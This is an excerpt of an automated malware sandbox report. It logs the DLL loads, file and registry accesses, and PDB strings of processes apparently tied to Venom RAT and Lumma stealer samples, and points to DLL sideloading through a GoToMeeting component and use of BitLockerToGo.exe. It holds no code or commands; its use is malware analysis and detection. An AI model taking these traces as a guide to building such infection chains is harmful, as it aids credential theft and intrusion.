Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: uiautomationcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\BD9E.exe	Section loaded: wintypes.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: amsi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: userenv.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: profapi.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: version.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: uxtheme.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: g2m.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe	Section loaded: msasn1.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\BD9E.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FpiUD4nYpj.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: FpiUD4nYpj.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Core.pdb(khvD source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Xml.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: rust_dave_sideload.pdb source: vm.exe, 00000012.00000002.4127183410.000000006CA98000.00000002.00000001.01000000.00000015.sdmp, lm.exe, 00000013.00000002.3195290349.000000006CA28000.00000002.00000001.01000000.00000016.sdmp, vm.exe, 00000019.00000002.3262778994.000000006CA98000.00000002.00000001.01000000.00000015.sdmp, g2m.dll0.14.dr
Source:	Binary string: System.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: BitLockerToGo.pdb source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564338018.000001A460D90000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564243556.000001A460DD0000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2733250356.000002EC2EF61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2733250356.000002EC2EF1E000.00000004.00000800.00020000.00000000.sdmp, vm.exe.14.dr, lm.exe.14.dr
Source:	Binary string: System.pdb) source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Configuration.ni.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: BitLockerToGo.pdbGCTL source: 34CA.exe, 00000008.00000002.2593726291.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564338018.000001A460D90000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000003.2564243556.000001A460DD0000.00000004.00001000.00020000.00000000.sdmp, 34CA.exe, 00000008.00000002.2594862605.000000C0008E6000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.Xml.pdb source: WERA01C.tmp.dmp.28.dr
Source:	Binary string: System.pdb source: WERA01C.tmp.dmp.28.dr
